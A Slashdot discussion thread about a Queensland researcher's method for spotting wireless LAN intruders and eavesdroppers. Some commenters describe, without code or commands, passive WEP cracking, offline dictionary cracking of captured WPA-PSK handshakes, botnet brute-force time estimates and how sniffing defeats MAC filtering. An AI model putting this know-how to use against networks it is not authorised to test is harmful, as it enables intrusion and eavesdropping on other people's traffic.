New Way to ID Invisible Intruders on Wireless LANs

Bergkamp10 writes "Australia's University of Technology in Queensland has created a groundbreaking new system that can detect invisible intruders on wireless LANs. Wireless networks have been almost impossible to thoroughly secure as they possess no clearly defined boundaries, instead they are defined by the quality and strength of the receiving antenna. QUT Information Security Institute researcher Dr Jason Smith has invented a new system to detect eavesdropping on unencrypted networks or active hijackings of computer sessions when a legitimate user who is logged onto the network leaves the connection. Smith has created a series of monitoring techniques that when used together can detect both attackers and configuration mistakes in network devices."

Virtually impossible?

[morgan_greywolf]

I don't know about that. I use WPA-PSK security on my WLAN, and I regularly monitor my network using ordinary means (logs, IDS, etc.) and I haven't seen any evidence of intruders, invisible or otherwise. I suppose this is one more thing I could add to my arsenal, but how many with security turned on really have trouble with this?

Re:Virtually impossible?

[cbiltcliffe]

and I regularly monitor my network using ordinary means (logs, IDS, etc.) and I haven't seen any evidence of intruders, invisible or otherwise. I suppose this is one more thing I could add to my arsenal, but how many with security turned on really have trouble with this?

If the intruders were invisible, how would you see them in logs and IDS? They're invisible. Passive monitoring won't show up in any logs. I know, because I do it sometimes as part of my security service to my customers. You can break into a WEP-encrypted moderate-traffic wireless network without sending a single packet. Once you're in, you can capture all traffic on that network and save it, again, without sending a single packet.
WPA can be cracked if someone uses a simple passphrase, and even random passphrases can be cracked without a whole lot of effort simply by renting part of a botnet, or running your own.

Using the Storm botnet as an example:

There were estimates that put the botnet as large as 50,000,000 computers. Having done WPA-PSK key cracking on a P4 1.6 laptop, it can run around 30 passphrases/second. My desktop is significantly faster, although I haven't actually tried PSK cracking on it. I'd assume probably 45 / second or more. It's not a state of the art machine, by any means. Probably about average.

So if we assume an 8 character random passphrase, (which is all a lot of people will use, so it's easier to remember) that you can type on your keyboard, (again, who's going to use Alt-Numpad combinations?) there are 96 possible keystroke characters that can make up each byte. 96^8 = 7213895789838336 possible password combinations.
Assuming 45 passphrases / second for each machine, it will take, using this botnet, just over 37 days to break that password. That's assuming the most complex password possible for 8 characters. Realistically, you can take out any special character that's not in 13375p3@k, and for most all you'd need is numbers and letters. That'll cut your time significantly.
Yes, that's only an 8 character password, which will take 96 times as long to break with only 1 extra character, but how many people, who don't use their full allotment of 63-characters of randomness, are going to use something like "password", "dave sucks", "fleabert" (name of their cat), or even "fleabert scratches too much" as their passphrase?
Now you've got standard words, which can easily be pulled from a dictionary and put together in different combinations until the passphrase is cracked. Trivial, with enough computing power. And unfortunately, the only people who have access to that kind of computing power, are (I shudder to use the word) cybercriminals.

Re:Virtually impossible?

[morgan_greywolf]

Of course, any security can be cracked... I personally use a shared key that is significantly longer than that. adding 1 extra character over 8 makes it 96^9, but adding, say 3 extra characters makes it 6382393305518410039296 possible password combinations, which would take that same botnet like 90,000 years to crack.

Oh, yeah, and bear in mind: those 50,000,000 would all have to be in range of the access point and would have to not overwhelm the access point. Even the best Cisco Aironet equipment isn't going to handle that kind of load.

Re:Virtually impossible?

yea, but if you set up your wireless network with a specific set of MACs and only allow those macs to log in, keep all of your machines on so someone can't hijack the mac, and disable logins to your router from anything but one of those macs, they won't even be able to connect even after they crack your password unless they can flood your router or otherwise break it. Very few people can do this.

If you augment this with weekly password changes and the strongest possible password, they aren't getting in unless they control a lot of systems. Yea they could still break your wireless network eventually, but there are other wireless networks that are far easier to get into so they'd move on.

Beyond that you secure the hosts on your network as well.

Security isn't about making your network unbreakable, which is impossible. It's about making your network not worth someone's time to break into. You do this with layered security and being polite.

Network crackers go for the low hanging fruit every time, unless it's a targeted attack, which most home users don't ever need to worry about unless they piss off the wrong person. They'll get your neighbor that didn't change the default password and doesn't password his hosts. There's a buffet out there of easy to break networks, so chances are, if you take reasonable precautions, and don't go around flaming people, you are fine.

Personally I don't run a wireless network. I pulled Cat5-e to every room in the house while I was rehabbing and don't need it. I did this before WEP matured because I didn't trust wireless at the time, wired networks Just Work(tm) and are much faster. Of course it's easy to do this when your walls are open 8)

-AC

Re:Virtually impossible?

[Alpha830RulZ]

Thanks for laying that out. I don't know what makes this so hard for people to get/do. Come up with 3 to 5 words of something that means something to you, separate with some punctuation, and make sure it's around even only 20 characters, and it should take a million machine botnet something like 10^21 years to crack, assuming the 45/tries a second metric. eg., "IHave7FavoriteFl()wer&" should be good for something like the remaining life of the universe. (3.6*10^27 years, by my calculations)

Even so called security professionals seem to have trouble with this. One of my favorite gripes is the security team at my new employer, who insist on forcing us to use 8 to 10 character passwords, no more, no less. They demand a numeral and a special character, which actually reduces the search space substantially. I am prone to setting up passwords for people like "Eagles~In*Trees" which is easy to remember, and tough to crack, but they won't let me any more, forcing us to issue things like "sFg#8Jk@", which the user promptly writes on a sticky note and pastes to the monitor so they won't forget it.

Re:Virtually impossible?

[kickdown]

"WPA can be cracked if someone uses a simple passphrase, and even random passphrases can be cracked without a whole lot of effort simply by renting part of a botnet, or running your own."

You are assuming that WPA needs a human-configured passphrase here. Your calculations are all nice, but they refer to WPA-PSK (pre-shared key). If you use WPA with IEEE 802.1x (sometimes called WPA-"Enterprise"), a PMK (Pairwise Master Key) is generated by a AAA server *anew for every session*. I.e. as soon as someone logs off and on again, your calculations got to start from scratch. I'm assuming people don't stay connected 37 days continuously on a WiFi connection, so your botnet attack is rendered useless. To be on the safe side, you can set your APs to negotiate new keys at your personal paranoia level time interval even when connections persist.

Even with WPA-PSK, your reasoning is only correct if you really want the PMK of WPA-PSK. Your botnet could be faster if you just want the current session key: it is 128 Bits in length (both with TKIP encryption and AES), so you only need to try 2^128 numbers to get in. The amount of randomness for the PMK is irrelevant if you just want to get into a session quick-and-dirty. Another reason for WPA users to rekey every so often.

WPA-Enterprise is used worldwide in educational institutions in a free (as in spirit and in beer) manner right now, including worldwide roaming: check http://www.eduroam.org./. Even in Queensland numerous universities are participating and thus have something at their disposal that is way less suscepible than static session keys. http://www.aarnet.edu.au./Content.aspx?p=133/ suggests that University of Queensland is in, so I guess they are just doing the research to show people how unsecure WLAN networking is if you *don't* use IEEE 802.1x :-) Yes, that was a shameless sales pitch. This is slashdot, I'm *supposed* to promote my pet projects here, right?

Re:Virtually impossible?

[cbiltcliffe]

You need to look into cracking WPA-PSK. You don't need to know anything about the traffic. All you need are 4 packets, one if which is a hash of the passphrase. You hash your passphrase list until you find one that matches the hash captured from the AP, and then you've got your passphrase. No extra traffic necessary.

Doesn't seem to practical

[faloi]

The description is, basically, they use the signal strength and round trip times of the signals to figure out if someone unauthorized is on your network. The downside is that, in large corporate wireless networks, I would think people tend to be pretty mobile and there won't be a reliable indicator that the odd signal from slightly too far away isn't just somebody who remembered one last thing on the way to their car. Smaller wireless networks aren't likely to care enough to spend the time it takes to tell.

It's an interesting idea, but I have a hard time seeing it become widespread.

Re:Doesn't seem to practical

[cyriustek]

Whislt you have somewhat of a point, the odd occasion where one may forget something and try to access the LAN at his car is an outlier to the data set. If the system notices someone from that location connecting to the network, and can either force a new authentication event requiring a local cert, or can simply shut down the AP the external person is connecting to. (Preferably shutting it down.)

As an aside, the company can also have a policy explicitly forbidding access from the parking lot. If what they had to do is so important, they can either go into the building, or wait until they are home and use their VPN connection.

Damn

[FredDC]

What? No, but this means that I[NO CARRIER]

"detect eavesdropping"

Yeah, right, detect eavesdropping. Any other snake oil you want to sell?

Triangulation

[JustKidding]

So, basically, they are just triangulating every node on the network, and detecting when a node is outside a given range (outside the building?), or seems to suddenly jump to another location (session hijacking)? Would this still work if the attacker is using a directional, high-gain antenna to prevent effective triangulation? Also, varying the signal strength and round trip time could throw this off, but even if the exact location of the attacker cannot be determined because of it, the alarm could still be raised.

Re:Triangulation

[Ungrounded+Lightning]

So, basically, they are just triangulating every node on the network, and detecting when a node is outside a given range (outside the building?), or seems to suddenly jump to another location (session hijacking)? Would this still work if the attacker is using a directional, high-gain antenna to prevent effective triangulation?

Sounds like they're not "triangulating" - computing the DIRECTION to a station from two monitoring locations in order to identify the station's location as the third point of a triangle. Instead they're measuring the round-trip time for a probe/response, which measures the distance (plus internal delays in the remote station) without identifying direction.

Adding delay can make a station appear to be farther than it is, but not nearer. So short of finding a way to send signals backward in time (or responding enough faster than the standard firmware to fool the montior) you can't spoof being closer than you are.

Which does nothing for a pure eavesdropper. But if the "eavesdropper"'s firmware associates with the eavesdropped network enough that it turns on its transmitter and responds to low-level protocol probes, it CAN be detected even if the user sends no traffic.

They're also using signal strength measurement - perhaps to work around unknown firmware response time. That might make them subject to spoofing by using a directional antenna and/or increasing transmit power to make the signal appear stronger, and thus closer, than it actually is.

(Another approach would be using multiple receivers at known (or self-measured relative) locations to do a LORAN-style triangulation on particular transmissions from the remote station, measuring the arrival-time differences at three or more stations to locate the remote station at the intersection of two or more hyperbolas. But that involves synchronizing time-bases between the monitoring stations in a way that would be beyond normal firmware's capabilities. It would also become less accurate as the distance to the remote station increases.)

Makes sense.

[ufoolme]

Aussie's are really into all this wireless stuff!

I'm fairly new to all this but at a very basic level it seems to make sense.
It just a more complex method of looking at the flashing lights on the modem to see if its in sync with your known wireless connections. -- Okay alot more complex than that.

I wondeer if this can be applied to other wireless systems, e.g., radio systems. If so it would be very useful

Re:Signal roundtrip times is the tipoff

[Silver+Sloth]

But leave the router open, wouldya? No, I won't.

I don't wan't anyone not authorised by me on my network. I see no reason why I 'ought to be required to provide this service to all listeners'. Sorry, my network, my rules.

eavesdropping

[backwardMechanic]

You can detect many things, but not eavesdropping. Your little wifi card broadcasts all kinds of data, in all directions. I can listen in and say nothing. How are you going to detect that? Warping of the ether?

Re:eavesdropping

[atdt1991]

Quantum Entanglement! We've got on-board chips for that ... right?

Re:eavesdropping

[Ungrounded+Lightning]

You can detect many things, but not eavesdropping. Your little wifi card broadcasts all kinds of data, in all directions. I can listen in and say nothing. How are you going to detect that?

Your firmware might react to being associated with a network enough to eavesdrop it by also responding to low-level configuration traffic. If that happens, even if you don't send any data the firmware may respond to probes, letting the network know you're listening.

If you're truly eavesdropping you're undetectable. But do you know what the vendor put in the binary blob?

Nothing to see here, move along

"Depending on how sensitive the network is, armed security guards could be deployed [...]"

And they would shoot the guy with the laptop in the lobby? Whoops, wrong guy. It was the other guy in the lobby. Nope, it was the woman in the parking lot. Wait, no, it was an anomoly.

Sounds more like a weak attempt at a research project.

Australia's University of Technology ?

[mybecq]

Australia's University of Technology in Queensland

Otherwise known in reality as the Queensland University of Technology in Australia.
Zonk or Bergkamp10, please do us all a favour and don't change the name of institutions.

How is this ground breaking?

[computerchimp]

1) hopping from one router to another is detected via traditional means
2) higher than average roundtrip times are noticed via traditional means
3) signal is triangulated via traditional means to put a location on a suspected signal.

A new but an obvious proceedure that someone has decided to put to paper and product. It is a nice product to notice but this is about as ground breaking as peanut butter and chocolate.

CC

Re:Signal roundtrip times is the tipoff

[X0563511]

What I love is that (the summary at least) article states you can use this to see if someone is monitoring your network.

Excuse me? How in the hells would you tell of someone was passively reading incoming radio waves? Isn't that the point of active vs passive radar systems, for instance? You can't!

Re:Signal roundtrip times is the tipoff

[jasen666]

Because if they download kiddie pr0n, it's *MY* IP address that gets logged, and my house the FBI raids looking for said kiddie pr0n.
Not worth the risk to be a good Samaritan to the neighbor's who can't afford their own internet.

This is new? Products that do some/all now...

[myvirtualid]

Not to flame or troll or slashvertise, but how is this new? I was a conference recently where the coolest security product on display was from http://www.airtightnetworks.net/: Their WIPS can be configured with an organization's known wireless clients (MAC address, make, HW and SW versions, etc.), and then detect systems that shouldn't be there.

According to the reseller's CTO - I had the good fortune to stop by the booth before he and the COO departed and the booth was left with only salesdroids - the system has an extensive database of fingerprints - hardware, software, etc., think of timings and the like specific to particular combinations of OS, firmware, and chipset.

This raises the bar for a snooper: They not only have to clone your MAC addresses, etc., they have to clone the MAC, etc., on a box running the same OS, firmware, chipset, as the legit box. And they have to get the WPA keys right.

(They also a neato WPA key management app to raise that bar, too.)

Apologies if this seems slashvertisical, seems to me the best way to debunk someone's claim of newnessess and neverbeendonebeforedness is to point real selling product that does all of the non-vapourware things the someone claims to have invented.

Re:Wireless 101

[robbeh]

WEP is useless and can be cracked in less than 10 minutes using any laptop made in the last 10 years. Keep on using that WPA though.
MAC filtering is useless because anyone with Kismet can see the active MAC addresses on the network.
SSID hiding is useless because anyone with Kismet can see the active SSIDs around them.

Someone mentioned it earlier, but have a look at this:
http://blogs.zdnet.com/Ou/index.php?p=43

Reading TFA.

[Eevee]

Well, the first thing you need to do is actually start reading the article you're using for support. From the fine article you quoted:

The FBI says it found CDs with child porn in Perez's room, the only one it searched.

Up to the time you can show how a wifi connection will make a physical CD magically show up in a room, then any argument about plausible deniability based off this case is full of it. You can't claim someone else was using your wireless connection to download child porn when you have a big stack of CDs with child pornography on them. Nobody is stupid enough to believe that. The only way this could have been a test case would be if they hadn't found any evidence beside the network traffic.

What this shows is that illegal traffic coming to/from your address constitutes probable cause, which is a different kettle of fish.